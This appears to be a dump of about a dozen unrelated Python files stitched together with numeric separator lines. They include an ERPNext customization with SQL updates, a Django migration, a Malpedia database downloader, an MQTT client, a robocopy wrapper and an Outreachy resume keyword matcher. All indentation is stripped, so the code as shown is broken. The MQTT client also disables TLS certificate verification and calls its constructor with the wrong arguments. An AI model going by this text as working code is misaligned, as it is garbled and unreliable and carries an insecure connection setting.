frappe.db.sql("""update `tabQuotation Item` set description = (replace(description,'<div><p>',' '))""")
frappe.db.sql("""update `tabQuotation Item` set description = (replace(description,'<br>',' '))""")
frappe.db.sql("""update `tabQuotation Item` set description = (replace(description,'<strong>',' '))""")
frappe.db.sql("""update `tabQuotation Item` set description = (replace(description,'</strong>',' '))""")
frappe.db.sql("""update `tabSales Order Item` set description = (replace(description,'<div class="ql-editor read-mode"><p>',''))""")
frappe.db.sql("""update `tabSales Order Item` set description = (replace(description,'</p></div>',''))""")
frappe.db.sql("""update `tabSales Order Item` set description = (replace(description,'</p><p>',' '))""")
@frappe.whitelist()
def quitar_tags():
frappe.db.sql("""update `tabPurchase Order Item` set description = (replace(description,'<div class="ql-editor read-mode"><p>',''))""")
frappe.db.sql("""update `tabPurchase Order Item` set description = (replace(description,'</p></div>',''))""")
frappe.db.sql("""update `tabPurchase Order Item` set description = (replace(description,'</p><p>',' '))""")
frappe.db.sql("""update `tabPurchase Order Item` set description = (replace(description,'<strong>',' '))""")
frappe.db.sql("""update `tabPurchase Order Item` set description = (replace(description,'</strong><strong>',' '))""")
@frappe.whitelist()
def get_chart_data():
query = """SELECT str_to_date(concat(date_format(`tabSales Invoice`.`posting_date`, '%Y-%m'), '-01'), '%Y-%m-%d') AS `posting_date`, sum(`tabSales Invoice`.`base_grand_total`) AS `sum`
FROM `tabSales Invoice`
WHERE (`tabSales Invoice`.`docstatus` = 1
AND `tabSales Invoice`.`metodo_pago` = 'PPD' AND DATE(`tabSales Invoice`.`posting_date`) >= '2021-04-01')
GROUP BY str_to_date(concat(date_format(`tabSales Invoice`.`posting_date`, '%Y-%m'), '-01'), '%Y-%m-%d')
ORDER BY str_to_date(concat(date_format(`tabSales Invoice`.`posting_date`, '%Y-%m'), '-01'), '%Y-%m-%d') ASC
"""
data = frappe.db.sql(query, as_list=1)
datasets = []
labels = []
for d in data:
labels.append(d[0])
datasets.append(d[1])
query2 = """SELECT str_to_date(concat(date_format(`tabPayment Entry`.`posting_date`, '%Y-%m'), '-01'), '%Y-%m-%d') AS `creation`, sum(`tabPayment Entry`.`paid_amount`) AS `sum`
FROM `tabPayment Entry`
WHERE `tabPayment Entry`.`docstatus` = 1 AND `tabPayment Entry`.`payment_type` = 'Receive'
GROUP BY str_to_date(concat(date_format(`tabPayment Entry`.`posting_date`, '%Y-%m'), '-01'), '%Y-%m-%d')
ORDER BY str_to_date(concat(date_format(`tabPayment Entry`.`posting_date`, '%Y-%m'), '-01'), '%Y-%m-%d') ASC
"""
data2 = frappe.db.sql(query2, as_list=1)
datapoints = []
labels2 = []
for d in data2:
labels2.append(d[0])
datapoints.append(d[1])
return{
"labels": labels,
"datasets": [{
"name": _("Ventas a Credito"),
"values": datasets,
"chartType": 'bar'
},
{
"name": _("Pagos"),
"values": datapoints,
"chartType": 'line'
}],
"type": "axis-mixed"
}
@frappe.whitelist()
def pi_monto_pendiente(name):
pi = frappe.get_doc('Purchase Invoice',name)
frappe.db.set_value("Purchase Invoice",name, 'monto_pendiente', pi.grand_total)
@frappe.whitelist()
def pago_proveedor_usd(name):
pe = frappe.get_doc('Payment Entry',name)
if pe.company == 'Sillas and Chairs':
per = frappe.get_list('Payment Entry Reference', filters={
'parent': pe.name})
for r in per:
frappe.db.set_value("Purchase Invoice",r, 'monto_pendiente', pe.paid_amount)
@frappe.whitelist()
def restore_monto_pendiente(name):
doc = frappe.get_doc('Payment Entry',name)
for i in doc.references:
frappe.db.set_value('Sales Invoice',i.reference_name,'monto_pendiente',i.monto_pendiente)
frappe.errprint(i.reference_name)
frappe.errprint(i.monto_pendiente)
@frappe.whitelist()
def clave(name):
numero = frappe.db.sql("""SELECT max(clave) + 1 as "clave" from `tabCustomer` ORDER BY creation desc """)
c = frappe.get_doc('Customer', name)
if c.clave is None:
frappe.db.set_value("Customer", c.name, 'clave', numero)
# frappe.db.sql("""UPDATE `tabCustomer` set cuenta_sat = CONCAT('110410', clave) WHERE cuenta_sat IS null """)
| 24,908 | 9,438 |
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting field 'Video.user'
db.delete_column('videos_video', 'user_id')
def backwards(self, orm):
# User chose to not deal with backwards NULL issues for 'Video.user'
raise RuntimeError("Cannot reverse this migration. 'Video.user' and its values cannot be restored.")
models = {
'videos.award': {
'Meta': {'object_name': 'Award'},
'award_type': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'category': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'preview': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'region': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
'video': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['videos.Video']", 'null': 'True', 'blank': 'True'})
},
'videos.video': {
'Meta': {'object_name': 'Video'},
'bitly_link_db': ('django.db.models.fields.URLField', [], {'default': "''", 'max_length': '200', 'blank': 'True'}),
'category': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2012, 2, 28, 0, 0)', 'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'judge_mark': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'region': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'shortlink': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'default': "'unsent'", 'max_length': '10'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'upload_url': ('django.db.models.fields.URLField', [], {'default': "''", 'max_length': '200'}),
'user_country': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'user_email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'user_name': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100'}),
'views': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'votes': ('django.db.models.fields.BigIntegerField', [], {'default': '0'})
}
}
complete_apps = ['videos'] | 3,008 | 959 |
import re
import os
import sys
import requests
try:
import config
except:
print("create a config.py based on template.config.py and set your Malpedia API token!")
sys.exit()
def delete_existing_dbs():
""" delete potentially existing old apivector db files """
for filename in os.listdir("dbs"):
if re.search(r"\d{4}-\d\d-\d\d-apivectors-v\d+\.csv", filename):
os.remove("dbs" + os.sep + filename)
def get_newest_db_version():
""" find ApiVector DB files and return newest version number found """
max_version = 0
for filename in os.listdir("dbs"):
version = re.search(r"\d{4}-\d\d-\d\d-apivectors-v(?P<version_number>\d+)\.csv", filename)
if version:
max_version = max(max_version, int(version.group("version_number")))
return max_version
def download_apivector_db():
result = {
"filename": "",
"content": "",
"version": 0
}
response = requests.get(
'https://malpedia.caad.fkie.fraunhofer.de/api/list/apiscout/csv',
headers={'Authorization': 'apitoken ' + config.APITOKEN},
)
if response.status_code == 200:
result["filename"] = response.headers['Content-Disposition'].split("=")[1].strip()
result["content"] = response.text
version = re.search(r"\d{4}-\d\d-\d\d-apivectors-v(?P<version_number>\d+)\.csv", result["filename"])
result["version"] = version
else:
print("Failed to download ApiVector DB, response code: ", response.status_code)
return result
def check_malpedia_version():
remote_version = 0
response = requests.get(
'https://malpedia.caad.fkie.fraunhofer.de/api/get/version'
)
if response.status_code == 200:
response_json = response.json()
remote_version =response_json["version"]
else:
print("Failed to check Malpedia version, response code: ", response.status_code)
return remote_version
def main():
db_version = get_newest_db_version()
malpedia_version = check_malpedia_version()
if db_version < malpedia_version:
apivector_update = download_apivector_db()
if apivector_update["version"]:
delete_existing_dbs()
update_db_path = "dbs" + os.sep + apivector_update["filename"]
with open(update_db_path, "w") as fout:
fout.write(apivector_update["content"])
print("Downloaded and stored ApiVector DB file: ", update_db_path)
else:
print("ApiVector update download failed.")
else:
print("Your ApiVector DB is the most recent ({})".format(malpedia_version))
if __name__ == "__main__":
sys.exit(main())
| 2,701 | 858 |
#!/usr/bin/env python
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Michael A.G. Aivazis
# California Institute of Technology
# (C) 1998-2003 All Rights Reserved
#
# <LicenseText>
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
class Declaration:
def __init__(self, locator):
self.locator = locator
return
def __str__(self):
if self.locator:
return "source='%s', line=%d, column=%d" % (
self.locator.filename, self.locator.line, self.locator.column)
return "source=<unknown>"
# version
__id__ = "$Id$"
# End of file
| 752 | 221 |
from .mode import Mode
from .document import Document
Document.promptinput = ''
class Prompt(Mode):
def __init__(self, document, callback=None):
Mode.__init__(self, document, callback)
self.inputstring = ''
self.start(document)
def processinput(self, document, userinput):
if isinstance(userinput, str):
key = userinput
if key == 'Cancel':
self.stop(document)
elif key == '\n':
document.promptinput = self.inputstring
self.stop(document)
elif len(key) > 1:
# key not supported
pass
else:
self.inputstring += key
else:
raise NotImplementedError('To be done.')
def start(self, doc):
Mode.start(self, doc)
doc.OnPrompt.fire(doc)
def stop(self, doc):
Mode.stop(self, doc)
doc.OnPrompt.fire(doc)
def prompt(promptstring='>'):
"""Constructor for the prompt mode."""
class PromptWithString(Prompt):
def __init__(self, document, callback=None):
Prompt.__init__(self, document, callback)
self.promptstring = promptstring
return PromptWithString
| 1,242 | 337 |
from lamson import queue
def attach_headers(message, user_id, post_name, domain):
"""Headers are used later by the index.py handler to figure out where
the message finally goes."""
message['X-Post-Name'] = post_name
message['X-Post-User-ID'] = user_id
message['X-Post-Domain'] = domain
def defer_to_queue(message):
index_q = queue.Queue("run/posts") # use a diff queue?
index_q.push(message)
print "run/posts count after dever", index_q.count()
| 482 | 157 |
# Copyright 2021 DeepMind Technologies Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tf2jax."""
from absl.testing import absltest
from absl.testing import parameterized
import jax.numpy as jnp
import numpy as np
import tensorflow as tf
from tf2jax._src import numpy_compat
_dtypes = [
tf.bool, tf.uint8, tf.uint16, tf.uint32, tf.uint64, tf.int8, tf.int16,
tf.int32, tf.int64, tf.bfloat16, tf.float16, tf.float32, tf.float64,
tf.complex64, tf.complex128
]
class NumpyCompatTest(parameterized.TestCase):
@parameterized.named_parameters(
("np", np, numpy_compat.tf_to_np_dtypes),
("jnp", jnp, numpy_compat.tf_to_jnp_dtypes),
)
def test_dtype_conversion(self, np_module, dtype_map):
self.assertEqual(len(_dtypes), len(dtype_map))
for src in _dtypes:
dst = "bool_" if src.name == "bool" else src.name
if src.name == "bfloat16":
self.assertIs(dtype_map[src], jnp.bfloat16)
else:
self.assertIs(dtype_map[src], getattr(np_module, dst))
if __name__ == "__main__":
absltest.main()
| 1,677 | 572 |
import paho.mqtt.client as mqtt
import ssl
import redis
import time
class MQTT_CLIENT(object):
def __init__(self,redis_site_data,server,port,user_name,password_key):
self.server = server
self.port = port
self.redis_site_data = redis_site_data
self.client = mqtt.Client(client_id="", clean_session=True, userdata=None, transport="tcp")
self.client.tls_set(certfile= "/home/pi/mosquitto/certs/client.crt", keyfile= "/home/pi/mosquitto/certs/client.key", cert_reqs=ssl.CERT_NONE )
redis_handle_pw = redis.StrictRedis(redis_site_data["host"],
redis_site_data["port"],
db=redis_site_data["redis_password_db"],
decode_responses=True)
self.client.username_pw_set(user_name, redis_handle_pw.hget(password_key,user_name))
self.client.on_connect = self.on_connect
self.client.on_publish = self.on_publish
def connect(self):
self.rc = -1
self.client.connect(self.server, self.port, 60)
self.client.loop_start()
for i in range(0,50):
time.sleep(.1)
if self.rc == 0:
return True
return False
def loop(self,time):
self.client.loop(time)
def on_connect(self,client, userdata, flags, rc):
print("on connect",flags,rc)
self.rc = rc
#self.client.loop_stop()
def on_publish(self, client, userdata, mid):
self.callback_flag = True
self.mid_server = mid
def disconnect(self):
self.client.disconnect()
self.client.loop_stop()
def publish(self,topic,payload=None,qos=0,retain=False):
self.callback_flag = False
self.mid_server = -1
self.client_result ,self.mid_client = self.client.publish(topic, payload, qos, retain)
if self.client_result != 0:
return False,-1
self.client.loop(5)
for i in range(0,50):
time.sleep(.1)
if self.callback_flag == True:
if (self.mid_server == self.mid_client):
return True ,0
else:
return False , -2
return False,-3
if __name__ == "__main__":
import json
import time
file_handle = open("../system_data_files/redis_server.json",'r')
data = file_handle.read()
file_handle.close()
redis_site_data = json.loads(data)
mqtt_client = MQTT_CLIENT(redis_site_data)
print(mqtt_client.connect())
print("starting to publish")
print(mqtt_client.publish("REMOTES/SLAVE:1/TEMPERATURE:Case",72))
while True:
pass
| 2,918 | 982 |
__author__ = 'Ralph'
import pandas as pd
from base import Node
from base import InputPort
from base import OutputPort
class Filter(Node):
def __init__(self, name):
super(Filter, self).__init__(name)
self.add_input_port(
InputPort(name='input', data_type=pd.DataFrame))
self.add_output_port(
OutputPort(name='output', data_type=pd.DataFrame))
def execute(self):
raise RuntimeError('Not implemented')
class FilterExamples(Filter):
def __init__(self):
super(FilterExamples, self).__init__('FilterExamples')
self.set_required_config_items(['filter_type'])
self._filter_types = ['all']
def execute(self):
self.check_config()
data = self.get_input_port('input').get_data()
if data is None:
return
self.get_output_port('output').set_data(data)
class FilterExampleRange(Filter):
pass
class RemoveDuplicates(Filter):
pass | 979 | 294 |
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
db = SQLAlchemy()
def create_app(debug=False):
from delphi.apps.rest_api.api import bp
app = Flask(__name__)
app.config.from_object("delphi.apps.rest_api.config")
app.debug=debug
db.init_app(app)
app.register_blueprint(bp)
return app
| 329 | 120 |
import os
import subprocess
from dataclasses import dataclass
from pathlib import WindowsPath
from time import sleep
from typing import Optional, Sequence
from click import ClickException
from rich.progress import Progress
import rob.console as con
import rob.filesystem
@dataclass
class RobocopyResults:
options: list[str]
# Using Sequence because "list" and other mutable container types are
# considered "invariant", so the contained type needs to match exactly.
# https://github.com/microsoft/pyright/issues/130
errors: Sequence[Optional[str]]
stats: Sequence[Optional[str]]
def parse_robocopy_output(
output: str,
) -> RobocopyResults:
output_list = output.split("\n")
output_list = [line for line in output_list if line]
divider_idx = []
for index, line in enumerate(output_list):
# 50 chars long. Finds dividers in output, which are 78/79 chars.
if "--------------------------------------------------" in line:
divider_idx.append(index)
options = output_list[divider_idx[1] + 1 : divider_idx[2]]
if len(divider_idx) == 3:
errors = output_list[divider_idx[2] + 1 :]
stats = []
else:
errors = output_list[divider_idx[2] + 1 : divider_idx[3]]
stats = output_list[divider_idx[3] + 1 :]
return RobocopyResults(
options=options,
errors=errors,
stats=stats,
)
def run_robocopy(
source: WindowsPath,
target: WindowsPath,
dir_size_bytes: Optional[int] = None,
dry_run: bool = False,
copy_permissions: bool = False,
quiet=False,
) -> None:
msg = f"Copying data from {con.style_path(source)} to {con.style_path(target)}"
if not dir_size_bytes:
dir_size_bytes = rob.filesystem.get_dir_size(source)
if target.exists():
con.print_(msg)
raise ClickException("{target} already exists")
if dry_run:
con.print_(msg, end="")
con.print_skipped()
return
if not quiet:
con.print_(msg)
robocopy_exe = (
WindowsPath(os.environ["SystemRoot"])
.joinpath("system32/robocopy.exe")
.resolve()
)
robocopy_args = [
str(robocopy_exe),
str(source),
str(target),
"/E", # copy subdirectories, including Empty ones.
"/MT", # Do multi-threaded copies with n threads (default 8).
"/R:0", # number of Retries on failed copies: default 1 million.
"/NDL", # No Directory List - don't log directory names.
"/NFL", # No File List - don't log file names.
"/NP", # No Progress - don't display percentage copied.
]
if copy_permissions:
robocopy_args.append(
# /COPY flags: D=Data, A=Attributes, T=Timestamps, X=Skip alt data streams,
# S=Security=NTFS ACLs, O=Owner info, U=aUditing info
"/COPY:DATSO"
)
proc = subprocess.Popen(
args=robocopy_args,
stdout=subprocess.PIPE,
# stderr included for completeness, robocopy doesn't seem to use it
stderr=subprocess.STDOUT,
text=True,
)
while proc.poll() is None:
# "is None" so that returncode 0 breaks loop
# 0: No errors occurred, and no copying was done.
# The source and destination directory trees are completely synchronized.
# 1: One or more files were copied successfully (that is, new files have arrived).
# https://ss64.com/nt/robocopy-exit.html
if not quiet:
with Progress(auto_refresh=False, transient=True) as progress:
task_id = progress.add_task(
"[green]Copying data...[/green]", total=dir_size_bytes
)
progress.update(task_id, completed=rob.filesystem.get_dir_size(target))
progress.refresh()
sleep(2)
output = proc.stdout.read() # type: ignore
# Exit code cannot be trusted as, for example, this error:
# ERROR 5 (0x00000005) Copying NTFS Security to Destination Directory
# ...can be present despite returncode 0, so let's look for errors ourselves
robocopy_results = parse_robocopy_output(output)
if robocopy_results.errors:
raise ClickException(f"Robocopy: {str(robocopy_results.errors)}")
if dir_size_bytes != rob.filesystem.get_dir_size(target):
raise ClickException("Source and target folder sizes do not match. Aborting.")
if not quiet:
con.print_("[green]Data copy complete[/green]")
| 4,524 | 1,385 |
#!/usr/bin/env python3
#
# Copyright 2017 Sarah Sharp <sharp@otter.technology>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# This script attempts to match skillset keywords in resumes with
# Outreachy projects. The skillset keyword lists are based on the
# Outreachy project list at:
# https://wiki.gnome.org/Outreachy/2017/MayAugust
#
# This program expects you to have created a directory with identically
# named PDF and text resume files. You can translate PDF files to text with:
# $ for i in `ls *.pdf`; do pdftotext $i; done
import argparse
import csv
import os
import re
import textwrap
#from fuzzywuzzy import fuzz
from enum import Enum
from collections import Counter
from shutil import copyfile
class outreachyProject:
"""Outreachy project name, description, keywords, and matching resume storage."""
def __init__(self, name, short, description, keywords, printskip):
self.name = name
self.description = description
self.keywords = keywords
self.strongResumeMatches = []
self.weakResumeMatches = []
self.short = short
self.printskip = printskip
class resumeFile:
"""Information relating to a text and pdf resume pair."""
def __init__(self, path, textFileName, contents):
self.path = path
self.textFileName = textFileName
self.pdfFileName = os.path.splitext(textFileName)[0] + '.pdf'
self.contents = contents
self.emails = re.findall(r'[\w\.-\_\+]+@[\w\.-]+', contents)
self.strongProjectMatches = []
self.weakProjectMatches = []
def readResumeFiles(directory):
resumeFiles = []
for f in [l for l in os.listdir(directory) if l.endswith('.txt') and
not l.endswith('-email.txt') and
not l.endswith('-email-tam.txt')]:
with open(os.path.join(directory, f), 'r') as resume:
contents = resume.read()
resumeFiles.append(resumeFile(directory, f, contents))
#print("Found", len(resumeFiles), "resume files")
for r in resumeFiles:
if len(r.emails) == 0:
continue
line = r.pdfFileName
for email in r.emails:
line = line + ' ' + email
line = line + ' ' + str(len(r.contents))
# The first email is usually the actual email.
emails = [resume.emails[0] for resume in resumeFiles if resume.emails]
edups = [item for item, count in Counter(emails).items() if count > 1]
for email in edups:
pdfs = [resume.pdfFileName for resume in resumeFiles if resume.emails and resume.emails[0] == email]
print('Email duplicate:', email, ' '.join(pdfs))
return resumeFiles
def searchForEmail(csvFile, resumeFiles):
with open(csvFile, 'r') as csvFile:
freader = csv.DictReader(csvFile, delimiter=',', quotechar='"')
boothstops = []
for row in freader:
# Create a list of potential matches for the email we have.
# Search through the list of emails in each PDF.
# Use fuzzywuzzy to do a fuzzy search in case we misread an email.
# No difference between pure match when I tried this, and going down to 80 only added false positives
#m = [r for r in resumeFiles if len([email for email in r.emails if fuzz.ratio(row['Email'], email) > 90]) != 0]
m = [r for r in resumeFiles if row['Email'] in r.emails]
if len(m) == 0:
continue
files = set()
for resume in m:
files.add(resume.pdfFileName)
boothstops.append((row['Email'], list(files)))
return boothstops
projectsMay2017 = [
#outreachyProject('Outreachy',
# ['open source', 'free software', 'Linux', 'Unix', 'Solaris']),
outreachyProject('Cadasta', 'a property rights tool',
'enhance user settings and create a user dashboard',
['django'], []),
outreachyProject('Cadasta', 'a property rights tool',
'add new login options',
['django|oauth'], []),
outreachyProject('Cadasta', 'a property rights tool',
'improve automated test coverage',
['selenium'], []),
outreachyProject('Ceph', 'a network filesystem',
'create a root cause analysis tool for Linux distributed systems',
['linux', 'distributed systems'], ['linux', 'distributed systems']),
outreachyProject('Ceph', 'a network filesystem',
'evaluate the performance of new reweight algorithms for balancing storage utilization',
['statistics', 'storage', 'linux'], ['statistics', 'storage', 'linux']),
outreachyProject('Ceph', 'a network filesystem',
'design a status dashboard to visualize Ceph cluster statistics',
['python', 'linux', 'javascript', 'html5', 'css3'], []),
outreachyProject('Ceph', 'a network filesystem',
'identify performance degradation in nodes and automate cluster response',
['Linux', 'python', 'distributed systems'], []),
outreachyProject('Ceph','a network filesystem',
'design a simplified database backend for the Ceph Object Gateway',
['database', 'Linux', 'C\+\+'], ['database']),
outreachyProject('Ceph','a network filesystem',
'port tests written in multiple languages to test the Amazon S3 storage protocol and Openstack Swift storage',
['python', 'linux', 'storage'], ['storage']),
outreachyProject('Debian', 'a Linux distribution',
'benchmark scientific packages for general and architecture specific builds',
['linux', 'gcc'], ['linux']),
outreachyProject('Debian', 'a Linux distribution',
'improve the Debian test database and website',
['linux', 'python', 'sql', 'shell|bash|command-line'], ['linux', 'command-line']),
outreachyProject('Debian', 'a Linux distribution',
'enhance the Debian test website',
['html', 'css', 'linux', 'graphic'], ['linux', 'graphic']),
outreachyProject('Debian', 'a Linux distribution',
'Add secure mail server support to FreedomBox (a web server for small machines)',
['python', 'django', 'shell|bash|command-line'], ['command-line']),
outreachyProject('Discourse', 'chat forum software',
'enhance their forum and chat web services',
['rails', 'javascript|ember.js'], []),
outreachyProject('Fedora', 'a Linux distribution',
'create a coloring book to explain technical concepts',
['inkscape|scribus|storyboard|storyboarding|graphic design'], ['graphic design', 'storyboard', 'storyboarding']),
outreachyProject('Fedora', 'a Linux distribution',
'improve Bodhi, the web-system that publishes updates for Fedora',
['python', 'javascript|html|css|linux|fedora'], []),
outreachyProject('GNOME', None,
'improve the recipes or maps applications',
['gtk'], []),
outreachyProject('Lagome', 'a microservices platform',
"create an online auction sample app to showcase Lagome's microservices",
['java', 'scala|react|reactive'], ['react', 'reactive']),
outreachyProject('Linux kernel', None,
'analyze memory resource release operators and fix Linux kernel memory bugs',
['linux', 'operating systems', 'memory'], ['linux', 'operating systems', 'memory']),
outreachyProject('Linux kernel', None,
'improve process ID allocation',
['linux', 'operating systems', 'kernel'], ['linux', 'operating systems', 'kernel']),
outreachyProject('Linux kernel', None,
'improve nftables (an in-kernel network filtration tool)',
['linux', 'operating systems', 'networking'], ['linux', 'operating systems', 'networking']),
outreachyProject('Linux kernel', None,
'write a driver for a sensor using the Industrial I/O interface',
['linux', 'operating systems|robotics|embedded', 'C\+\+|C(?!\+\+)'],
['linux', 'operating systems', 'robotics', 'embedded', 'c++']),
outreachyProject('Linux kernel', None,
'improve documentation build system and translate docs into ReStructured Text format',
['perl', 'python', 'operating systems'], ['operating systems']),
outreachyProject('Mozilla', None,
None,
['mozilla|firefox'], ['mozilla', 'firefox']),
outreachyProject('OpenStack', 'software for cloud deployment and management',
'add continuous integration for OpenStack Identity Service (keystone) LDAP support',
['python', 'shell|bash|command-line'], ['command-line']),
outreachyProject('oVirt', 'virtualization management software',
'implement oVirt integration tests using Lago and the oVirt REST API',
['python', 'rest'], ['rest']),
outreachyProject('oVirt', 'virtualization management software',
'design an oVirt log analyzer for distributed systems',
['python', 'linux', 'distributed systems'], ['distributed systems']),
outreachyProject('oVirt', 'virtualization management software',
'rewrite oVirt UI dialogs in modern JavaScript technologies',
['es6|react|redux'], []),
outreachyProject('QEMU', 'hardware virtualization software',
'rework the QEMU audio backend',
['C(?!\+\+)', 'audio'], ['audio']),
outreachyProject('QEMU', 'hardware virtualization software',
'create a full and incremental disk backup tool',
['C(?!\+\+)', 'python', 'storage'], ['storage']),
outreachyProject('QEMU', 'hardware virtualization software',
"refactor the block layer's I/O throttling and write notifiers",
['C(?!\+\+)', 'storage'], ['storage']),
outreachyProject('QEMU', 'hardware virtualization software',
"code an emulated PCIe-to-PCI bridge",
['pci|pcie'], ['pci', 'pcie']),
outreachyProject('QEMU', 'hardware virtualization software',
"add x86 virtualization support on macOS using Hypervisor.framework",
['C(?!\+\+)', 'mac', 'virtualization'], ['mac', 'virtualization']),
outreachyProject('QEMU', 'hardware virtualization software',
"extend the current vhost-pci based inter-VM communication",
['C(?!\+\+)', 'pci'], ['pci']),
outreachyProject('Sugar Labs', 'a software-development and learning community',
'improve Music Blocks, an application for exploring fundamental musical concepts',
['javascript|JS', 'music'], ['music']),
outreachyProject('Wikimedia', 'a non-profit known for Wikipedia',
'write a Zotero translator and document the process',
['javascript', 'documentation'], ['documentation']),
outreachyProject('Wikimedia', 'a non-profit known for Wikipedia',
'improve and fix bugs in the quiz extension',
['php', 'documentation'], ['documentation']),
outreachyProject('Wikimedia', 'a non-profit known for Wikipedia',
'create user guides to help with translation outreach',
['translation|localization'], ['translation', 'localization']),
outreachyProject('Wikimedia', 'a non-profit known for Wikipedia',
'implement automatic edits on wikis connected to the Programs & Events Dashboard',
['rails'], []),
outreachyProject('Wikimedia', 'a non-profit known for Wikipedia',
'implement an automatic article feedback feature for the Programs & Events Dashboard',
['rails'], []),
outreachyProject('Wine', 'a tool to run Windows programs on Linux or BSD',
'implement a resource editor and dialog editor',
['C(?!\+\+)', 'Windows', 'UI|UX'], ['windows', 'ui', 'ux']),
outreachyProject('Wine', 'a tool to run Windows programs on Linux or BSD',
'implement missing D3DX9 APIs',
['C(?!\+\+)', 'computer graphics'], []),
outreachyProject('Wine','a tool to run Windows programs on Linux or BSD',
'implement Direct3D microbenchmarks',
['C(?!\+\+)', 'opengl'], []),
outreachyProject('Wine','a tool to run Windows programs on Linux or BSD',
'create automated game benchmarks',
['C(?!\+\+)', 'game engine'], ['game engine']),
outreachyProject('Wine','a tool to run Windows programs on Linux or BSD',
'port WineLib to a new architecture (such as PPC64, Sparc64, RISC-V, or x32)',
['PPC|PowerPC|Sparc|Sparc64|RISC-V'], ['ppc', 'powerpc', 'sparc', 'sparc64', 'risc-v']),
outreachyProject('Wine','a tool to run Windows programs on Linux or BSD',
'improve the AppDB website, which lists Wine support for Windows programs',
['php', 'html', 'mysql'], []),
outreachyProject('Xen Project', 'a virtualization platform',
'create golang bindings for libxl on the Xen hypervisor',
['go', 'C(?!\+\+)'], []),
outreachyProject('Xen Project', 'a virtualization platform',
'create rust bindings for libxl on the Xen hypervisor',
['rust'], ['rust']),
outreachyProject('Xen Project', 'a virtualization platform',
'enhance the KDD (Windows Debugger Stub) for the Xen hypervisor',
['C(?!\+\+)', 'windows', 'kernel|debugger'], ['windows', 'debugger']),
outreachyProject('Xen Project', 'a virtualization platform',
'fuzz test the Xen hypercall interface',
['C(?!\+\+)', 'assembly', 'gcc'], []),
outreachyProject('Xen Project', 'a virtualization platform',
'improve Mirage OS, a unikernel that runs on top of Xen',
['ocaml'], []),
outreachyProject('Xen Project', 'a virtualization platform',
'create a Xen code review dashboard',
['sql', 'javascript', 'html5', 'java'], []),
#outreachyProject('Xen Project', 'a virtualization platform',
# 'implement tools for code standards checking using clang-format',
# ['clang']),
outreachyProject('Xen Project', 'a virtualization platform',
'add more FreeBSD testing to osstest',
['freebsd|bsd|openbsd|netbsd|dragonfly'], ['freebsd', 'bsd', 'openbsd', 'netbsd', 'dragonfly']),
outreachyProject('Yocto', 'a tool for creating embedded Linux distributions',
'improve and document the Yocto autobuilder',
['C(?!\+\+)', 'python', 'distro|linux|yocto|openembedded', 'embedded|robotics|beaglebone|beagle bone|minnow|minnowboard|arduino'], ['distro', 'linux', 'yocto', 'embedded', 'robotics', 'beaglebone', 'beagle bone', 'minnow', 'minnowboard', 'arduino']),
]
# We have two types of resumes:
# 1. They matched *some* but not all of the important keywords for a project.
# 2. They matches all of the keywords we need.
def matchResumes(resumeFiles):
for resume in resumeFiles:
for project in projectsMay2017:
matches = [set(re.findall(r'\b(?:' + keyword + r')\b', resume.contents, flags=re.IGNORECASE)) for keyword in project.keywords]
# New syntax for me!
# * takes a list and expands it to arguments to a function.
# ** takes a dictionary and expands it to key-value arguments to a function.
# union combines the list of sets and removes duplicates.
keywords = set.union(*matches)
if all(matches):
resume.strongProjectMatches.append((project, keywords))
project.strongResumeMatches.append(resume)
elif any(matches):
resume.weakProjectMatches.append((project, keywords))
project.weakResumeMatches.append(resume)
def matchWithProjects(resumeFiles):
goldresumes = []
matchResumes(resumeFiles)
#for project in projectsMay2017:
# print(len(project.strongResumeMatches), '\t', project.name, '\t', project.description)
#print('Resumes to review:', len([resume for resume in resumeFiles if len(resume.strongProjectMatches) > 0]))
#print('Resumes with strong matches:')
#for i in range(1, 9):
# resumeCount = [resume for resume in resumeFiles if len(resume.strongProjectMatches) == i]
# if resumeCount:
# print(len(resumeCount), 'with', i, 'strong matches')
#resumeCount = [resume for resume in resumeFiles if len(resume.strongProjectMatches) > 9]
